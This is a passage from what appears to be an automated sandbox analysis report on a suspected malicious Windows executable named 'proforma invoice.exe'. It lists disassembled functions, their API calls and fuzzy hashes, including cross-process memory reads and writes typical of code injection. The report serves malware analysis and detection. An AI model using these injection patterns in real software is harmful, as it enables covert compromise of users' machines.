                  • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00AFFF41,80070057,?,?), ref: 00B00054
                  • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00AFFF41,80070057,?), ref: 00B00064
                  • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00AFFF41,80070057,?,?), ref: 00B00070
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: From$Prog$FreeStringTasklstrcmpi
                  • String ID:
                  • API String ID: 3897988419-0
                  • Opcode ID: c016179a1144cd78d640625da959e6f06c7534a1668aec7cc22abde97fc01f2d
                  • Instruction ID: d3a6a4bc0615d47e2d44f304dfdd2e17540f9929222137d3eef90a1755d06f40
                  • Opcode Fuzzy Hash: c016179a1144cd78d640625da959e6f06c7534a1668aec7cc22abde97fc01f2d
                  • Instruction Fuzzy Hash: BE01A276610208BFDB115FA8DC48BAE7EEDEF44751F248164F905E3250EB71DE408BA0
                  Function 00B0E97B Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON
                  Download Yara Rule
                  APIs
                  • QueryPerformanceCounter.KERNEL32(?), ref: 00B0E997
                  • QueryPerformanceFrequency.KERNEL32(?), ref: 00B0E9A5
                  • Sleep.KERNEL32(00000000), ref: 00B0E9AD
                  • QueryPerformanceCounter.KERNEL32(?), ref: 00B0E9B7
                  • Sleep.KERNEL32 ref: 00B0E9F3
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: PerformanceQuery$CounterSleep$Frequency
                  • String ID:
                  • API String ID: 2833360925-0
                  • Opcode ID: 639467a793eff54dcff6f2137b3f0bc9ab832519d36d9d190d6ea1b199c6c9af
                  • Instruction ID: 4b11a12d4bd0cb563405a2a3524470e6305aa1515887d60a9929813a957728ab
                  • Opcode Fuzzy Hash: 639467a793eff54dcff6f2137b3f0bc9ab832519d36d9d190d6ea1b199c6c9af
                  • Instruction Fuzzy Hash: 4A011731C01A29DBCF00ABE5DD59AEDBFB8FB09701F100996E512B2291CF309654DBA1
                  Function 00B010F9 Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON
                  Download Yara Rule
                  APIs
                  • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00B01114
                  • GetLastError.KERNEL32(?,00000000,00000000,?,?,00B00B9B,?,?,?), ref: 00B01120
                  • GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00B00B9B,?,?,?), ref: 00B0112F
                  • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00B00B9B,?,?,?), ref: 00B01136
                  • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00B0114D
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                  • String ID:
                  • API String ID: 842720411-0
                  • Opcode ID: 87c662245a051cb078a1a5602809ce1cd84daf1fafa677aa46f8ffa075d592a6
                  • Instruction ID: 1771060a834e1b86af07300fcfd135225a71c7b6266757d47b3247147b4ec232
                  • Opcode Fuzzy Hash: 87c662245a051cb078a1a5602809ce1cd84daf1fafa677aa46f8ffa075d592a6
                  • Instruction Fuzzy Hash: 45011979200615FFDB154FA9DC49A6A3FAEEF893A0B204459FA45E73A0DE31DC009B60
                  Function 00B00FB4 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON
                  Download Yara Rule
                  APIs
                  • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00B00FCA
                  • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00B00FD6
                  • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00B00FE5
                  • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00B00FEC
                  • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00B01002
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: HeapInformationToken$AllocErrorLastProcess
                  • String ID:
                  • API String ID: 44706859-0
                  • Opcode ID: 857c5f7680773c4d9e13ebe345748454a2469bc80579a48e5086d94e3ff1a02a
                  • Instruction ID: 4ab8a7ab56a51bd17df94bdefefcd5c6a5594f806dbfb128eb91ade97e0ee0cf
                  • Opcode Fuzzy Hash: 857c5f7680773c4d9e13ebe345748454a2469bc80579a48e5086d94e3ff1a02a
                  • Instruction Fuzzy Hash: 37F04939200301BBDB264FA89C49F5A3FADEF89762F204854FA85E7291DE70DC508B60
                  Function 00B01014 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON
                  Download Yara Rule
                  APIs
                  • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00B0102A
                  • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00B01036
                  • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00B01045
                  • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00B0104C
                  • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00B01062
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: HeapInformationToken$AllocErrorLastProcess
                  • String ID:
                  • API String ID: 44706859-0
                  • Opcode ID: 08bb8aa7c873bb9854415df66526cfde67cde419e0fde532cf847aed6fc3e649
                  • Instruction ID: 035601ad5c0324475d5dddc260bb1325bfbead68cabaf4d2844b1e1ed01c305c
                  • Opcode Fuzzy Hash: 08bb8aa7c873bb9854415df66526cfde67cde419e0fde532cf847aed6fc3e649
                  • Instruction Fuzzy Hash: 29F04939200301BFDB255FA8EC49F5A3FADEF89761F200814FA85E7290DE70D8508B60
                  Function 00B1030F Relevance: 7.5, APIs: 6, Instructions: 41COMMON
                  Download Yara Rule
                  APIs
                  • CloseHandle.KERNEL32(?,?,?,?,00B1017D,?,00B132FC,?,00000001,00AE2592,?), ref: 00B10324
                  • CloseHandle.KERNEL32(?,?,?,?,00B1017D,?,00B132FC,?,00000001,00AE2592,?), ref: 00B10331
                  • CloseHandle.KERNEL32(?,?,?,?,00B1017D,?,00B132FC,?,00000001,00AE2592,?), ref: 00B1033E
                  • CloseHandle.KERNEL32(?,?,?,?,00B1017D,?,00B132FC,?,00000001,00AE2592,?), ref: 00B1034B
                  • CloseHandle.KERNEL32(?,?,?,?,00B1017D,?,00B132FC,?,00000001,00AE2592,?), ref: 00B10358
                  • CloseHandle.KERNEL32(?,?,?,?,00B1017D,?,00B132FC,?,00000001,00AE2592,?), ref: 00B10365
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: CloseHandle
                  • String ID:
                  • API String ID: 2962429428-0
                  • Opcode ID: c39bbd742e3ae23b1bf95113c1bb4ecac39c3d3c45b65a00d675c0f45b8f4512
                  • Instruction ID: 755911c0ae0b95c671ff4a2ab7f0f24ecc9145cfdcabaf408a538f302853cf6f
                  • Opcode Fuzzy Hash: c39bbd742e3ae23b1bf95113c1bb4ecac39c3d3c45b65a00d675c0f45b8f4512
                  • Instruction Fuzzy Hash: E201EE72800B019FCB30AF66E880842FBF9FF643053148A3FD1A252930C3B0A999CF84
                  Function 00ADD73A Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  • _free.LIBCMT ref: 00ADD752
                    • Part of subcall function 00AD29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00ADD7D1,00000000,00000000,00000000,00000000,?,00ADD7F8,00000000,00000007,00000000,?,00ADDBF5,00000000), ref: 00AD29DE
                    • Part of subcall function 00AD29C8: GetLastError.KERNEL32(00000000,?,00ADD7D1,00000000,00000000,00000000,00000000,?,00ADD7F8,00000000,00000007,00000000,?,00ADDBF5,00000000,00000000), ref: 00AD29F0
                  • _free.LIBCMT ref: 00ADD764
                  • _free.LIBCMT ref: 00ADD776
                  • _free.LIBCMT ref: 00ADD788
                  • _free.LIBCMT ref: 00ADD79A
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: _free$ErrorFreeHeapLast
                  • String ID:
                  • API String ID: 776569668-0
                  • Opcode ID: 66ab9a0cfb7402804fd95cd45db0dfa22f41c7409606008875abadeb1b58bbdb
                  • Instruction ID: 5e2360da156aa8fe7c8cb22b05ce717c8d25e723b2d966f529ca27d725ae0947
                  • Opcode Fuzzy Hash: 66ab9a0cfb7402804fd95cd45db0dfa22f41c7409606008875abadeb1b58bbdb
                  • Instruction Fuzzy Hash: D5F03632544204AB8625EB64FAC5D267BDDBB94750B940C47F09EE7781CB74FC80CB64
                  Function 00B05C44 Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON
                  Download Yara Rule
                  APIs
                  • GetDlgItem.USER32(?,000003E9), ref: 00B05C58
                  • GetWindowTextW.USER32(00000000,?,00000100), ref: 00B05C6F
                  • MessageBeep.USER32(00000000), ref: 00B05C87
                  • KillTimer.USER32(?,0000040A), ref: 00B05CA3
                  • EndDialog.USER32(?,00000001), ref: 00B05CBD
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: BeepDialogItemKillMessageTextTimerWindow
                  • String ID:
                  • API String ID: 3741023627-0
                  • Opcode ID: 5120f64f02baf92bd14eeba76f555408d0eed5e682d497b10f36ed77d5376cd4
                  • Instruction ID: f56ff2cfecac37cd53b6cf10396f1a066f08578c0f1d9861d8dbaf757d9b7dc0
                  • Opcode Fuzzy Hash: 5120f64f02baf92bd14eeba76f555408d0eed5e682d497b10f36ed77d5376cd4
                  • Instruction Fuzzy Hash: 9801FB31500B04ABFB315B50DE8EFAA7FA8EB04B45F141599A582A24E1DBB4A9848F90
                  Function 00AD22A0 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                  Download Yara Rule
                  APIs
                  • _free.LIBCMT ref: 00AD22BE
                    • Part of subcall function 00AD29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00ADD7D1,00000000,00000000,00000000,00000000,?,00ADD7F8,00000000,00000007,00000000,?,00ADDBF5,00000000), ref: 00AD29DE
                    • Part of subcall function 00AD29C8: GetLastError.KERNEL32(00000000,?,00ADD7D1,00000000,00000000,00000000,00000000,?,00ADD7F8,00000000,00000007,00000000,?,00ADDBF5,00000000,00000000), ref: 00AD29F0
                  • _free.LIBCMT ref: 00AD22D0
                  • _free.LIBCMT ref: 00AD22E3
                  • _free.LIBCMT ref: 00AD22F4
                  • _free.LIBCMT ref: 00AD2305
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: _free$ErrorFreeHeapLast
                  • String ID:
                  • API String ID: 776569668-0
                  • Opcode ID: 9ea776ef7fbcaa4476fe2890f9b55b3d590e652b4b784a63a64de2241f9f34fd
                  • Instruction ID: 2ac0a475e415e6c523e48abe5af8690c76f95dda51972fe1eb95c8fb842db39b
                  • Opcode Fuzzy Hash: 9ea776ef7fbcaa4476fe2890f9b55b3d590e652b4b784a63a64de2241f9f34fd
                  • Instruction Fuzzy Hash: C8F03AB18101208F8622BF68BD11A683FA4B778760700094BF41AD73B2CF740891FBA4
                  Function 00AB95C5 Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                  Download Yara Rule
                  APIs
                  • EndPath.GDI32(?), ref: 00AB95D4
                  • StrokeAndFillPath.GDI32(?,?,00AF71F7,00000000,?,?,?), ref: 00AB95F0
                  • SelectObject.GDI32(?,00000000), ref: 00AB9603
                  • DeleteObject.GDI32 ref: 00AB9616
                  • StrokePath.GDI32(?), ref: 00AB9631
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Path$ObjectStroke$DeleteFillSelect
                  • String ID:
                  • API String ID: 2625713937-0
                  • Opcode ID: 2a7cefe96edfff1e052ce37b9988dfb2f9db8c254e400dee032d2aed9866e059
                  • Instruction ID: 1ce0757963b7c014628822a71ef7c0e40d138449d236fbe02914cd6b0965b9ed
                  • Opcode Fuzzy Hash: 2a7cefe96edfff1e052ce37b9988dfb2f9db8c254e400dee032d2aed9866e059
                  • Instruction Fuzzy Hash: 78F0B631005644EBDB265FADED187A97F65AB01322F148614E66A660F2CF308997DF20
                  Function 00AD0F47 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 389COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: __freea$_free
                  • String ID: a/p$am/pm
                  • API String ID: 3432400110-3206640213
                  • Opcode ID: b00c9ff40218c87cb55138337f199cf5b4451afe645aaed4d0969b4075a18df6
                  • Instruction ID: 14f94ea2cf28f25464f0d1c2fd10fb1c8c20ddc492500320847321e6947d5e0c
                  • Opcode Fuzzy Hash: b00c9ff40218c87cb55138337f199cf5b4451afe645aaed4d0969b4075a18df6
                  • Instruction Fuzzy Hash: A8D1F031900206EADB689F68C989BFAB7B1EF05700F28426BE9079F751D3759D80CB91
                  Function 00B27B7E Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 230COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00AC0242: EnterCriticalSection.KERNEL32(00B7070C,00B71884,?,?,00AB198B,00B72518,?,?,?,00AA12F9,00000000), ref: 00AC024D
                    • Part of subcall function 00AC0242: LeaveCriticalSection.KERNEL32(00B7070C,?,00AB198B,00B72518,?,?,?,00AA12F9,00000000), ref: 00AC028A
                    • Part of subcall function 00AA9CB3: _wcslen.LIBCMT ref: 00AA9CBD
                    • Part of subcall function 00AC00A3: __onexit.LIBCMT ref: 00AC00A9
                  • __Init_thread_footer.LIBCMT ref: 00B27BFB
                    • Part of subcall function 00AC01F8: EnterCriticalSection.KERNEL32(00B7070C,?,?,00AB8747,00B72514), ref: 00AC0202
                    • Part of subcall function 00AC01F8: LeaveCriticalSection.KERNEL32(00B7070C,?,00AB8747,00B72514), ref: 00AC0235
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
                  • String ID: 5$G$Variable must be of type 'Object'.
                  • API String ID: 535116098-3733170431
                  • Opcode ID: d6ab8b72bba3621e62b608e126e9adde547cb58339c1fc16c075eeb96820559b
                  • Instruction ID: f1a214c85a3064e782589bdb183afa5db492d522fdb668a20c1756f81c97dc88
                  • Opcode Fuzzy Hash: d6ab8b72bba3621e62b608e126e9adde547cb58339c1fc16c075eeb96820559b
                  • Instruction Fuzzy Hash: 3D919E70A44219EFCB14EF94E990DADB7F1FF49340F108099F80A6B2A2DB31AE41CB55
                  Function 00B02716 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00B0B403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00B021D0,?,?,00000034,00000800,?,00000034), ref: 00B0B42D
                  • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00B02760
                    • Part of subcall function 00B0B3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00B021FF,?,?,00000800,?,00001073,00000000,?,?), ref: 00B0B3F8
                    • Part of subcall function 00B0B32A: GetWindowThreadProcessId.USER32(?,?), ref: 00B0B355
                    • Part of subcall function 00B0B32A: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00B02194,00000034,?,?,00001004,00000000,00000000), ref: 00B0B365
                    • Part of subcall function 00B0B32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00B02194,00000034,?,?,00001004,00000000,00000000), ref: 00B0B37B
                  • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00B027CD
                  • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00B0281A
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                  • String ID: @
                  • API String ID: 4150878124-2766056989
                  • Opcode ID: fdd48bb80db5a5290575e8bdfce70db1beebf170314ffb9bf7721165eadf36c7
                  • Instruction ID: 357e3fe2aee6a53a5459dca160670608ca2b77766ff78c4819a080f5b5fc8819
                  • Opcode Fuzzy Hash: fdd48bb80db5a5290575e8bdfce70db1beebf170314ffb9bf7721165eadf36c7
                  • Instruction Fuzzy Hash: 7E41EB76900218AFDB10DFA4CD46EEEBBB8EF09700F108095FA55B7191DB716E49CBA1
                  Function 00AD172E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON
                  Download Yara Rule
                  APIs
                  • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\proforma invoice.exe,00000104), ref: 00AD1769
                  • _free.LIBCMT ref: 00AD1834
                  • _free.LIBCMT ref: 00AD183E
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: _free$FileModuleName
                  • String ID: C:\Users\user\Desktop\proforma invoice.exe
                  • API String ID: 2506810119-2184432382
                  • Opcode ID: deafea1c00ed99ed810e23e65adcde30bd0e328e1731a0f26bde168b7d6c42fe
                  • Instruction ID: 4410268bc959d563fa023d2025b4fbfe26ebdc19dcc157895ebc05152ab91525
                  • Opcode Fuzzy Hash: deafea1c00ed99ed810e23e65adcde30bd0e328e1731a0f26bde168b7d6c42fe
                  • Instruction Fuzzy Hash: 11316E75A00218BFDB21DB99D985D9EBBFCEB95310B1441A7F806D7321DA708E80DBA0
                  Function 00B0C27D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114windowCOMMON
                  Download Yara Rule
                  APIs
                  • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00B0C306
                  • DeleteMenu.USER32(?,00000007,00000000), ref: 00B0C34C
                  • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00B71990,014F6228), ref: 00B0C395
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Menu$Delete$InfoItem
                  • String ID: 0
                  • API String ID: 135850232-4108050209
                  • Opcode ID: e6f6d05b97cf3a773d8c0821cafea4e367f7346507f69f92f8aeffc6f9c14199
